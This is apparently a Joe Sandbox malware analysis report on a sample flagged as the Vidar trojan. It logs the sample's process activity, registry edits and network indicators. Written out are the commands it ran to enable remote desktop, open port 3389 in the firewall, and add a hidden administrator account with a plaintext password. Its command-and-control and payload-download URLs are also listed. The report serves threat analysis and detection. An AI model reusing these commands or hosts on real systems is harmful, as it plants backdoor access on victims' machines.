                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0043B58C OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,StartServiceW,GetLastError,Sleep,StartServiceW,CloseServiceHandle,CloseServiceHandle,9_2_0043B58C
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Size FROM Win32_DiskDrive
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeMemory allocated: 4880000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: OpenSCManagerW,GetLastError,EnumServicesStatusExW,GetLastError,CloseServiceHandle,EnumServicesStatusExW,CloseServiceHandle,GetLastError,CloseServiceHandle,9_2_0043B7D4
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeWindow / User API: threadDelayed 6035Jump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeWindow / User API: threadDelayed 3925Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeDropped PE file which has not been started: C:\Windows\System32\rfxvmt.dllJump to dropped file
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exe TID: 7544Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exe TID: 7576Thread sleep count: 6035 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exe TID: 7580Thread sleep count: 3925 > 30Jump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_004092D8 FindFirstFileW,FindClose,9_2_004092D8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_0040F73C FindFirstFileW,FindClose,9_2_0040F73C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00408EB9 lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,9_2_00408EB9
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00409D02 GetSystemInfo,9_2_00409D02
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, net1.exe, 0000001D.00000002.2101682538.00000000034D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
                            Source: 67065b4c84713_Javiles.exe, 00000000.00000002.2171143255.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1769071163.0000016E11236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: net1.exe, 0000001D.00000002.2101682538.00000000034D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
                            Source: C:\Windows\System32\drivers\tsusbhub.sysSystem information queried: ModuleInformationJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeMemory allocated: page read and write | page guardJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /fJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /fJump to behavior
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user JustonThompson G2ywh4BZ30yu /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user JustonThompson G2ywh4BZ30yu /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" JustonThompson /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" JustonThompson /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" JustonThompson /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" JustonThompson /addJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,9_2_004093C0
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00408908
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,9_2_00412C4A
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,9_2_00412C4C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,9_2_00412C98
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeQueries volume information: C:\Users\user\Desktop\67065b4c84713_Javiles.exe VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00411154 GetLocalTime,9_2_00411154
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 9_2_00414698 GetVersionExW,9_2_00414698
                            Source: C:\Users\user\Desktop\67065b4c84713_Javiles.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

                            Remote Access Functionality

                            barindex
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessionsJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnectionsJump to behavior
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
                            Windows Management Instrumentation
                            1
                            LSASS Driver
                            1
                            LSASS Driver
                            21
                            Disable or Modify Tools
                            OS Credential Dumping1
                            System Time Discovery
                            2
                            Remote Desktop Protocol
                            1
                            Archive Collected Data
                            12
                            Ingress Tool Transfer
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts12
                            Command and Scripting Interpreter
                            1
                            DLL Side-Loading
                            1
                            DLL Side-Loading
                            1
                            Deobfuscate/Decode Files or Information
                            LSASS Memory1
                            System Service Discovery
                            Remote Desktop ProtocolData from Removable Media11
                            Encrypted Channel
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Service Execution
                            1
                            Create Account
                            1
                            Access Token Manipulation
                            31
                            Obfuscated Files or Information
                            Security Account Manager2
                            File and Directory Discovery
                            SMB/Windows Admin SharesData from Network Shared Drive1
                            Non-Standard Port
                            Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron21
                            Windows Service
                            21
                            Windows Service
                            12
                            Software Packing
                            NTDS128
                            System Information Discovery
                            Distributed Component Object ModelInput Capture3
                            Non-Application Layer Protocol
                            Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                            Process Injection
                            1
                            Timestomp
                            LSA Secrets211
                            Security Software Discovery
                            SSHKeylogging14
                            Application Layer Protocol
                            Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading
                            Cached Domain Credentials141
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                            Masquerading
                            DCSync1
                            Application Window Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            Modify Registry
                            Proc Filesystem1
                            System Network Configuration Discovery
                            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt141
                            Virtualization/Sandbox Evasion
                            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                            Access Token Manipulation
                            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                            Process Injection
                            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531874 Sample: 67065b4c84713_Javiles.exe Startdate: 11/10/2024 Architecture: WINDOWS Score: 100 67 hansgborn.eu 2->67 69 api.ipify.org 2->69 77 Multi AV Scanner detection for dropped file 2->77 79 Multi AV Scanner detection for submitted file 2->79 81 .NET source code contains potential unpacker 2->81 83 7 other signatures 2->83 9 67065b4c84713_Javiles.exe 15 3 2->9         started        14 rdpdr.sys 8 2->14         started        16 rdpvideominiport.sys 4 2->16         started        18 tsusbhub.sys 3 2->18         started        signatures3 process4 dnsIp5 71 8.46.123.33, 3389, 49739 AS-PUBMATICUS United States 9->71 73 147.45.44.104, 49730, 80 FREE-NET-ASFREEnetEU Russian Federation 9->73 75 3 other IPs or domains 9->75 59 C:\Users\user\AppData\Local\...\RDPWInst.exe, PE32 9->59 dropped 61 C:\Users\...\67065b4c84713_Javiles.exe.log, CSV 9->61 dropped 89 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 9->89 20 cmd.exe 1 9->20         started        22 cmd.exe 1 9->22         started        25 cmd.exe 1 9->25         started        27 6 other processes 9->27 file6 signatures7 process8 signatures9 29 RDPWInst.exe 2 5 20->29         started        33 conhost.exe 20->33         started        85 Uses cmd line tools excessively to alter registry or file data 22->85 87 Adds a new user with administrator rights 22->87 45 2 other processes 22->45 35 net.exe 1 25->35         started        37 conhost.exe 25->37         started        39 net.exe 1 27->39         started        41 net.exe 1 27->41         started        43 net.exe 1 27->43         started        47 7 other processes 27->47 process10 file11 63 C:\Program Files\RDP Wrapper\rdpwrap.dll, PE32+ 29->63 dropped 65 C:\Windows\System32\rfxvmt.dll, PE32+ 29->65 dropped 91 Multi AV Scanner detection for dropped file 29->91 93 Machine Learning detection for dropped file 29->93 95 Uses netsh to modify the Windows network and firewall settings 29->95 97 3 other signatures 29->97 49 netsh.exe 2 29->49         started        51 net1.exe 1 35->51         started        53 net1.exe 1 39->53         started        55 net1.exe 1 41->55         started        57 net1.exe 1 43->57         started        signatures12 process13

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            67065b4c84713_Javiles.exe88%ReversingLabsByteCode-MSIL.Trojan.Vidar
                            67065b4c84713_Javiles.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe100%Joe Sandbox ML
                            C:\Program Files\RDP Wrapper\rdpwrap.dll54%ReversingLabsWin64.PUA.RDPWrapper
                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe68%ReversingLabsWin32.PUA.RDPWrap
                            C:\Windows\System32\rfxvmt.dll0%ReversingLabs
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            hansgborn.eu
                            188.114.96.3
                            truefalse
                              unknown
                              api.ipify.org
                              172.67.74.152
                              truefalse
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exefalse
                                  unknown
                                  https://hansgborn.eu/core/receive.phpfalse
                                    unknown
                                    http://api.ipify.org/false
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://github.com/bchavez/Bogus.67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpfalse
                                        unknown
                                        http://www.apache.org/licenses/LICENSE-2.0RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalse
                                          unknown
                                          http://api.ipify.orgd67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FAD000.00000004.00000800.00020000.00000000.sdmp, 67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://github.com/bchavez/Bogus/issues/5467065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpfalse
                                              unknown
                                              https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniURDPWInst.exe, 00000009.00000000.1765768816.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalse
                                                unknown
                                                http://schemas.xmlsoap.org/soap/encoding/67065b4c84713_Javiles.exe, 00000000.00000002.2171602944.0000000002810000.00000004.08000000.00040000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.apache.org/licenses/RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalse
                                                  unknown
                                                  https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpfalse
                                                    unknown
                                                    https://github.com/lontivero/Open.Nat/issuesOAlso67065b4c84713_Javiles.exe, 00000000.00000002.2171602944.0000000002810000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      unknown
                                                      https://loremflickr.com67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.xmlsoap.org/soap/envelope/67065b4c84713_Javiles.exe, 00000000.00000002.2171602944.0000000002810000.00000004.08000000.00040000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniRDPWInst.exefalse
                                                          unknown
                                                          http://hansgborn.eud67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://picsum.photos67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpfalse
                                                              unknown
                                                              https://placeimg.com67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                unknown
                                                                https://hansgborn.eu67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://github.com/bchavez/Bogus/issues/11567065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://api.ipify.org67065b4c84713_Javiles.exefalse
                                                                      unknown
                                                                      http://stascorp.com/load/1-1-0-62RDPWInst.exe, RDPWInst.exe, 00000009.00000000.1765768816.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalse
                                                                        unknown
                                                                        http://stascorp.comDVarFileInfo$67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002B4B000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.9.drfalse
                                                                          unknown
                                                                          https://github.com/bchavez/Bogus/wiki/Bogus-Premium67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://hansgborn.eu67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://github.com/bchavez/Bogus67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://via.placeholder.com/67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://hansgborn.eu/core/receive.phpd67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002FB3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://hansgborn.eu/core/receive.phpihttp://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe67065b4c84713_Javiles.exefalse
                                                                                      unknown
                                                                                      http://147.45.44.10467065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002B3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://github.com/bchavez/Bogus:67065b4c84713_Javiles.exe, 00000000.00000002.2174014042.0000000005020000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name67065b4c84713_Javiles.exe, 00000000.00000002.2171643627.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          239.255.255.250
                                                                                          unknownReserved
                                                                                          unknownunknownfalse
                                                                                          8.46.123.33
                                                                                          unknownUnited States
                                                                                          62713AS-PUBMATICUStrue
                                                                                          188.114.96.3
                                                                                          hansgborn.euEuropean Union
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          147.45.44.104
                                                                                          unknownRussian Federation
                                                                                          2895FREE-NET-ASFREEnetEUfalse
                                                                                          172.67.74.152
                                                                                          api.ipify.orgUnited States
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1531874
                                                                                          Start date and time:2024-10-11 23:06:06 +02:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 7m 0s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:39
                                                                                          Number of new started drivers analysed:3
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
